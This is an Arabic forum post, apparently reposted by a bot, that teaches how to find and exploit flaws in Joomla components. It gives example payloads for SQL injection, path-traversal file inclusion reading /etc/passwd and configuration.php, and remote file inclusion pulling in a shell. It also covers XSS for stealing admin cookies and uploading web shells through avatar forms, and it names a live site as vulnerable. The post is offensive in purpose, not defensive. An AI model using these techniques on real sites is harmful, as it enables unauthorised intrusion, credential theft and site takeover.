حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M

    السلام عليكم و رحمة الله تعالى وبركاته .
    تسجلت في مجتمع الهكر الاخلاقي . حبيت اخلي اول مشاركة مضوع |1|

    اليوم معي شرح خفيف حول اكتشاف الثغرات في جوملا .

    -ما هي الملحقات ؟

    من اجل البدأ يجب عليك تنصيب جوملا في السيرفر الشخصي . بعدها ادخل للوحة و اضف روابط للملحق
    للاضافات التي تريد و لكي تضهر روابط على هذا الشكل
    localhost/joomla/index.php?option=com_v4&Item=1&itemid=11
    روح على
    Administration =>Menus=>Gestion des menus=>nouveau

    index.php?option= هذي دورها االاتصال بالملحق او استدعائه
    com_v4 = اسم الملحق
    itemid=11 و Item=1 = هاذو معرف سوف نتكلم عنهم لاحقا .
    طبعا الان لديك رسم او فكرة عن روايط الجملة بشكل عام . الامر الذي سيساعدك في المراحل القادمة .
    طيب بعد المقدمة نتحدث عن اختراق الجوملا .
    سنتحدث عن 4 انواع من الثغرات و هي
    SQL Injection و Local File Include و Remote File include و Xss و Upload.
    االاشياء التي يجب الانتباه البها اثناء الاختراق هي كالتالي :
    الفورمز او المدخلات و هي مثل مربع البحث او التعليق الخ ...
    - بارامترات الروابط مثل id و controller و cat و page الخ
    نبدا على بركة الله .

    1 - SQL INJECTION

    هذا النوع من الثغرات هو الاكثر انتشارا في الجوملا .
    مثال على رابط مصاب بالسكيول :
    index.php?option=com_v4&cat=11&Item=1
    لبارامترات التي تكون مسؤولة عن الثغرة هي :
    cat , category , kat , id, kats , userid , catid , cats,Item, entry, page,Itemid , categories
    و هناك بارامترات اخرى . . .
    طبعا اكتشاف هل البارامتر مصاب او لا هذا امر معروف فقط تقوم باضافة ' .
    لكي تفهمو اكثر . خلينا نشوف ثغرات .
    index.php?option=com_peliculas&view=peliculas&id=n ull[Sql Injection]
    هنا الملحق المصاب هو piliculas و البارمترالمصاب id .

    مثال هذا الموقع مصاب http://www2.pasadizo.com/index.php?o...iculas&id=1807


    2 - Local File Include

    هذا النوع من الثغرات يسمح لك باستدعاء اي ملف بشرط ان يكون هذا الملف داخل الموقع .
    مثلا يمكنك من استعراض الكونفغ . او ملف /etc/passwd بدون مشاكل .

    ثغرات local file include هي الاخرى منتشرة بنسبة معينة في اضافات الجوملا .

    مثال على رابط مصاب local file include :
    index.php?option= com_v4 =2&view=lfi

    الباراميترات التي تسبب الاصابة بهذا النوع من الثغرات هي :
    - controller
    - view
    - layout
    - page

    امثلة :
    index.php?option= com_v4 =2&controller=lfi
    البارامتر المصاب :controller
    index.php?option= com_v4 =2&view=lfi
    البارامتر المصاب:view

    index.php?option= com_v4 =2&layout=lfi
    البارامتر المصاب: layout

    index.php?option= com_v4 =2&page=lfi
    البارامتر المصاب: page

    لو اريد استعراض ملف passwd مثلا .
    index.php?option=com_v4 &controller=../../../../etc/passwd%00

    في المثال السابق .. استعملنا البارامتر contorller في استدعاء ملف الباسوورد كمثال .
    لاستدعاء الكونفج راح بصير هيك .
    index.php?option=com_v4 &controller=../../../configuration.php
    طبعا كل هذي ملفات تحتوي على معلومات حساسة من شانها ان تتسبب في اختراق السيرفر .
    ملاحضة : هنا انا اشرح بدون تعمق فلو انت لا تعرف شيء
    روح راجع شرحات موجودة بكثرة على هذ النوع .

    3 - Remote File Include

    هذا النوع من الثغرات يسمح لك باستدعاء ملفات خارجية .
    مثال على رابط مصاب local file remote :
    index.php?option=com_v4 &Itemid=&mosConfig_abso lute_path=RFI
    البارامترات المصابة :
    mosConfig.absolute.path
    task
    يعني رابط مصاب راح يكون شكله مثل هذا :
    index.php?option=com_v4 &Itemid=&mosConfig.abso lute.path=rfi
    البارامتر المصاب : mosConfig.absolute.path
    طبعا اذا وجدت ملحق مصاب . حاول انك تستدعي شل . مثلا :
    index.php?option=com_v4team&Itemid=&mosConfig.abso lute.path=http://localhost/shell.txt?

    4 - xss

    النوع من هذا الثغرات له نوعان . واحد مخزن و الاخر لا .
    الفرق بينها هو ان المخزنة تخزن البيانات في قواعد البيانات . مما يجعلها خطيرة .
    اما الثانية فلا تخزن .
    لاكتشاف هذا النوع من الثغرات يجب عليك الانتباه للمدخلات .
    اقصد بالمدخلات مربعات البحث و مكان ادخال الردود الخ . . .
    فيمكنك وضع كود استعلام مثل a l e r t (12345)
    و اذا ضهرت نافذه مكتوب فبها 12345 يعني انه مصاب ..
    فائدة الثغرة هي انها تمكنك من سرقة كوكيز الادمن .
    اما اذا كانت مخزنة فيمكنك زرع كود تحويل الى اندكسك او صفحة ملغمة الخ ...

    5- upload

    هذه الثغرات عموما تمكنك من رفع شل بدون اي مشاكل .
    اكتشافها سهل . كل ما عليك هو ان تجد مركز رفع و تجرب رفع شل .
    عندما اقول مركز رفع فانا اقصد اي مكان يمكنك من خلاله ملفات .
    مثل رفع الصورة الشخصية فبدل الصورة جرب ان ترفع شل .
    ممكن تلاقي مشكل في ايجاد مسار نزول الملف . هناك طريقة جميلة كنت قد راتها في احد المنتديات
    وهي مثلا اذا كنت تشتغل في السيرفر الشخصي . ورفعت ملف 1.php لم تجد مسار نزوله ؟
    بكل بساطة ارجع للوندوس و اعمل بحث في ملف C:\AppServ\www عن 1.php و راح يجيب مساره ض1 .



    المصدر: شبكة عراق تيم IQ-TEAM - من قسم: |[ RSS Forum ]|

    avp h;jaht eyvhj tdJoomla Compon3nts​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة